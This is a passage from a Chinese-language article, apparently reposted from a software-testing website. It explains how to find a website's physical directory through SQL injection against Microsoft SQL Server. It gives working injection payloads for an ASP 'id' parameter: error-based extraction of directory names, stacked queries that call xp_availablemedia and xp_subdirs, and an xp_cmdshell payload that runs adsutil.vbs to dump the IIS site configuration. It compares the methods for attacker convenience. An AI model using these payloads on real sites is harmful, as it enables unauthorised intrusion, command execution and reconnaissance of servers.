軟件測試開發技術SQL Server取得網站路徑的幾種方法及比較

返回：Microsoft OLE DB Provider for SQL Server 錯誤 80040e07

將 varchar 值 ’@Inetpub’轉換為數據類型為 int 的列時發生語法錯誤。

再依次爆出表中的目錄名稱!

語句：http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from

dirs where paths not in( ’@Inetpub’))--

返回：Microsoft OLE DB Provider for SQL Server 錯誤 80040e07

將 varchar 值 ’test’轉換為數據類型為 int 的列時發生語法錯誤。

再依次爆出表中的目錄名稱!

方法同上,就不說了

有時候我們也可以用下面的兩個擴展來干些事情

1)我們可以利用xp_availablemedia來獲得當前所有驅動器,并存入dirs表中：

5 ;insert dirs exec master.dbo.xp_availablemedia;--

我們可以通過查詢temp的內容來獲得驅動器列表及相關信息

(2)我們可以利用xp_subdirs獲得子目錄列表,并存入dirs表中：

5 ;insert into dirs exec master.dbo.xp_subdirs ’c:\’ ;--

優缺點分析:

很明顯了,這樣就不會出現xp_dirtree那種所有目錄都放在一起的情況了,只會顯示一級目錄,找起來方便多了.

缺點也很明顯,只有sa有這個權限,也有可能管理員刪除了這個擴展(畢竟太強大了).

方法三:

這種方法很好

下面這個是原文

想到了使用adsutil.vbs程序,我是這樣執行的

a’;exec master..xp_cmdshell ’cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt’;--是不是很長啦通過它我們可以把iis里面第一個虛擬web站點的設置情況(當然包括它所在的實際目錄咯)，導入到a.txt中對于a.txt的實際位置默認當然是c:\winnt\system32,其實這都不是問題，不過遇到管理員把adsutil.vbs，刪了或是放到別的地方我們就沒辦法了(不可能自已用echo 命令寫一個吧)

文章來源于領測軟件測試網 http://www.kjueaiud.com/